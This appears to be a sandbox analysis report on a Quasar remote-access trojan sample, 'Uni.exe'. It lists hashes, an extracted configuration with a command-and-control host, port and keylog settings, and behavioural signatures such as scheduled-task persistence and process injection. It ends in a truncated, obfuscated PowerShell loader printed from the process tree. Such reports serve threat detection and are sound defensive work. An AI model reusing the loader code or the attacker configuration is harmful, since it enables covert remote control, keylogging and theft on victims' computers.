Analysis
-
max time kernel
1800s -
max time network
1797s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
08-05-2024 17:28
Behavioral task
behavioral1
Sample
Uni.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral2
Sample
Uni.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
Uni.exe
Resource
win7-20240419-en
Behavioral task
behavioral4
Sample
Uni.exe
Resource
win10v2004-20240508-en
General
-
Target
Uni.exe
-
Size
409KB
-
MD5
7417c8c73e614f293152575f46134216
-
SHA1
cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805
-
SHA256
00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3
-
SHA512
897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0
-
SSDEEP
6144:nMr2pJAJcC0B632U3GRbMfgvKFFhTEDPX1NbKoEn5MSU+h2f8/14m:LpyJcC+82U3GRGGp1M5Ys2f8/6m
Malware Config
Extracted
quasar
3.1.5
SLAVE
even-lemon.gl.at.ply.gg:33587
$Sxr-dOMA5C0pQTTpKjVsCp
-
encryption_key
UBXs44u6E81wxBGZxQHk
-
install_name
$sxr-powershell.exe
-
log_directory
$SXR-KEYLOGS
-
reconnect_delay
3000
-
startup_key
$sxr-powershell
-
subdirectory
$sxr-seroxen2
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/3660-1-0x0000000000130000-0x000000000019C000-memory.dmp family_quasar C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 4384 created 584 4384 powershell.EXE winlogon.exe PID 2352 created 584 2352 powershell.EXE winlogon.exe -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
$sxr-powershell.exeinstall.exeinstall.exepid process 4240 $sxr-powershell.exe 4008 install.exe 4388 install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 6 raw.githubusercontent.com 7 raw.githubusercontent.com 10 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in System32 directory 15 IoCs
Processes:
OfficeClickToRun.exesvchost.exesvchost.exepowershell.EXEpowershell.EXEdescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6D1A73D92C4DC2751A4B5A2404E1BDCC svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9C237ECACBCB4101A3BE740DF0E53F83 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 4384 set thread context of 2256 4384 powershell.EXE dllhost.exe PID 2352 set thread context of 3408 2352 powershell.EXE dllhost.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeSCHTASKS.exeschtasks.exepid process 4280 schtasks.exe 4552 SCHTASKS.exe 3364 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEpowershell.EXEOfficeClickToRun.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={447BF857-54C7-402E-9358-1A2490BB118D}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.EXEpowershell.EXEdllhost.exedllhost.exe$sxr-powershell.exepid process 4384 powershell.EXE 4384 powershell.EXE 4384 powershell.EXE 2352 powershell.EXE 2352 powershell.EXE 2352 powershell.EXE 4384 powershell.EXE 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2352 powershell.EXE 3408 dllhost.exe 3408 dllhost.exe 2256 dllhost.exe 4240 $sxr-powershell.exe 2256 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 4240 $sxr-powershell.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Uni.exe$sxr-powershell.exepowershell.EXEpowershell.EXEdllhost.exesvchost.exedescription pid process Token: SeDebugPrivilege 3660 Uni.exe Token: SeDebugPrivilege 4240 $sxr-powershell.exe Token: SeDebugPrivilege 4384 powershell.EXE Token: SeDebugPrivilege 2352 powershell.EXE Token: SeDebugPrivilege 4384 powershell.EXE Token: SeDebugPrivilege 2256 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2028 svchost.exe Token: SeIncreaseQuotaPrivilege 2028 svchost.exe Token: SeSecurityPrivilege 2028 svchost.exe Token: SeTakeOwnershipPrivilege 2028 svchost.exe Token: SeLoadDriverPrivilege 2028 svchost.exe Token: SeSystemtimePrivilege 2028 svchost.exe Token: SeBackupPrivilege 2028 svchost.exe Token: SeRestorePrivilege 2028 svchost.exe Token: SeShutdownPrivilege 2028 svchost.exe Token: SeSystemEnvironmentPrivilege 2028 svchost.exe Token: SeUndockPrivilege 2028 svchost.exe Token: SeManageVolumePrivilege 2028 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2028 svchost.exe Token: SeIncreaseQuotaPrivilege 2028 svchost.exe Token: SeSecurityPrivilege 2028 svchost.exe Token: SeTakeOwnershipPrivilege 2028 svchost.exe Token: SeLoadDriverPrivilege 2028 svchost.exe Token: SeSystemtimePrivilege 2028 svchost.exe Token: SeBackupPrivilege 2028 svchost.exe Token: SeRestorePrivilege 2028 svchost.exe Token: SeShutdownPrivilege 2028 svchost.exe Token: SeSystemEnvironmentPrivilege 2028 svchost.exe Token: SeUndockPrivilege 2028 svchost.exe Token: SeManageVolumePrivilege 2028 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2028 svchost.exe Token: SeIncreaseQuotaPrivilege 2028 svchost.exe Token: SeSecurityPrivilege 2028 svchost.exe Token: SeTakeOwnershipPrivilege 2028 svchost.exe Token: SeLoadDriverPrivilege 2028 svchost.exe Token: SeSystemtimePrivilege 2028 svchost.exe Token: SeBackupPrivilege 2028 svchost.exe Token: SeRestorePrivilege 2028 svchost.exe Token: SeShutdownPrivilege 2028 svchost.exe Token: SeSystemEnvironmentPrivilege 2028 svchost.exe Token: SeUndockPrivilege 2028 svchost.exe Token: SeManageVolumePrivilege 2028 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2028 svchost.exe Token: SeIncreaseQuotaPrivilege 2028 svchost.exe Token: SeSecurityPrivilege 2028 svchost.exe Token: SeTakeOwnershipPrivilege 2028 svchost.exe Token: SeLoadDriverPrivilege 2028 svchost.exe Token: SeSystemtimePrivilege 2028 svchost.exe Token: SeBackupPrivilege 2028 svchost.exe Token: SeRestorePrivilege 2028 svchost.exe Token: SeShutdownPrivilege 2028 svchost.exe Token: SeSystemEnvironmentPrivilege 2028 svchost.exe Token: SeUndockPrivilege 2028 svchost.exe Token: SeManageVolumePrivilege 2028 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2028 svchost.exe Token: SeIncreaseQuotaPrivilege 2028 svchost.exe Token: SeSecurityPrivilege 2028 svchost.exe Token: SeTakeOwnershipPrivilege 2028 svchost.exe Token: SeLoadDriverPrivilege 2028 svchost.exe Token: SeSystemtimePrivilege 2028 svchost.exe Token: SeBackupPrivilege 2028 svchost.exe Token: SeRestorePrivilege 2028 svchost.exe Token: SeShutdownPrivilege 2028 svchost.exe Token: SeSystemEnvironmentPrivilege 2028 svchost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
$sxr-powershell.exepid process 4240 $sxr-powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Uni.exe$sxr-powershell.exepowershell.EXEdllhost.exedescription pid process target process PID 3660 wrote to memory of 4280 3660 Uni.exe schtasks.exe PID 3660 wrote to memory of 4280 3660 Uni.exe schtasks.exe PID 3660 wrote to memory of 4280 3660 Uni.exe schtasks.exe PID 3660 wrote to memory of 4240 3660 Uni.exe $sxr-powershell.exe PID 3660 wrote to memory of 4240 3660 Uni.exe $sxr-powershell.exe PID 3660 wrote to memory of 4240 3660 Uni.exe $sxr-powershell.exe PID 3660 wrote to memory of 4008 3660 Uni.exe install.exe PID 3660 wrote to memory of 4008 3660 Uni.exe install.exe PID 3660 wrote to memory of 4008 3660 Uni.exe install.exe PID 3660 wrote to memory of 4552 3660 Uni.exe SCHTASKS.exe PID 3660 wrote to memory of 4552 3660 Uni.exe SCHTASKS.exe PID 3660 wrote to memory of 4552 3660 Uni.exe SCHTASKS.exe PID 4240 wrote to memory of 3364 4240 $sxr-powershell.exe schtasks.exe PID 4240 wrote to memory of 3364 4240 $sxr-powershell.exe schtasks.exe PID 4240 wrote to memory of 3364 4240 $sxr-powershell.exe schtasks.exe PID 4240 wrote to memory of 4388 4240 $sxr-powershell.exe install.exe PID 4240 wrote to memory of 4388 4240 $sxr-powershell.exe install.exe PID 4240 wrote to memory of 4388 4240 $sxr-powershell.exe install.exe PID 4384 wrote to memory of 2256 4384 powershell.EXE dllhost.exe PID 4384 wrote to memory of 2256 4384 powershell.EXE dllhost.exe PID 4384 wrote to memory of 2256 4384 powershell.EXE dllhost.exe PID 4384 wrote to memory of 2256 4384 powershell.EXE dllhost.exe PID 4384 wrote to memory of 2256 4384 powershell.EXE dllhost.exe PID 4384 wrote to memory of 2256 4384 powershell.EXE dllhost.exe PID 4384 wrote to memory of 2256 4384 powershell.EXE dllhost.exe PID 4384 wrote to memory of 2256 4384 powershell.EXE dllhost.exe PID 2256 wrote to memory of 584 2256 dllhost.exe winlogon.exe PID 2256 wrote to memory of 640 2256 dllhost.exe lsass.exe PID 2256 wrote to memory of 740 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 900 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 1008 2256 dllhost.exe dwm.exe PID 2256 wrote to memory of 1020 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 380 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 1040 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 1052 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 1060 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 1152 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 1188 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 1296 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 1316 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 1332 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 1384 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 1476 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 1536 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 1544 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 1592 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 1660 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 1704 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 1792 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 1800 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 1864 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 1896 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 2028 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 2060 2256 dllhost.exe spoolsv.exe PID 2256 wrote to memory of 2144 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 2384 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 2548 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 2556 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 2568 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 2620 2256 dllhost.exe sihost.exe PID 2256 wrote to memory of 2644 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 2728 2256 dllhost.exe svchost.exe PID 2256 wrote to memory of 2760 2256 dllhost.exe sysmon.exe PID 2256 wrote to memory of 2780 2256 dllhost.exe svchost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{4a2639b3-06fd-43b6-af5f-e825dae32727}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{67684dbd-b4de-4fab-b5e7-ba556b293c74}2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AtOxPcwyxZHS{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MMqEyvedFwUVbg,[Parameter(Position=1)][Type]$GMebarGgfM)$sUxQxSNEZZx=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+[Char](101)+''+[Char](99)+''+'t'+'e'+[Char](100)+''+[Char](68)+'el'+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+'e'+[Char](109)+''+'o'+'r'+'y'+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+'yD'+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+'t'+''+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+'e','C'+'l'+'a'+[Char](115)+''+'s'+''+','+'Pu'+[Char](98)+''+[Char](108)+'ic'+','+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+''+'i'+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+'Au'+[Char](116)+''+[Char](111)+'Cl'+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$sUxQxSNEZZx.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+'yS'+[Char](105)+'g'+','+'P'+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$MMqEyvedFwUVbg).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$sUxQxSNEZZx.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+'o'+''+'k'+''+'e'+'',''+'P'+'ub'+[Char](108)+''+'i'+''+[Char](99)+''+','+'H'+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+''+'S'+'i'+[Char](103)+','+[Char](78)+'e'+'w'+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+','+''+'V'+'i'+'r'+''+[Char](116)+''+'u'+''+[Char](97)+'l',$GMebarGgfM,$MMqEyvedFwUVbg).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+'i'+''+'m'+''+'e'+''+','+'M'+[Char](97)+''+'n'+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $sUxQxSNEZZx.CreateType();}$dzFGPcvPBLmbf=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+''+'e'+''+'m'+''+'.'+''+[Char](100)+'ll')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+'f'+'t'+''+[Char](46)+'W'+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+'n'+'s'+[Char](97)+''+[Char](102)+''+[Char](101)+'N'+'a'+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+'h'+'o'+'d'+''+'s'+'');$ecKHQVOuQGEuLl=$dzFGPcvPBLmbf.GetMethod(''+'G'+'e'+'t'+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+''+'A'+''+'d'+''+[Char](100)+''+'r'+'e'+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+'bl'+[Char](105)+''+'c'+''+','+'S'+[Char](116)+'a'+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$FhInqOXfQgwxpYrhdeB=AtOxPcwyxZHS @([String])([IntPtr]);$DFzrmQMwlZsAUtAzmaXkvk=AtOxPcwyxZHS 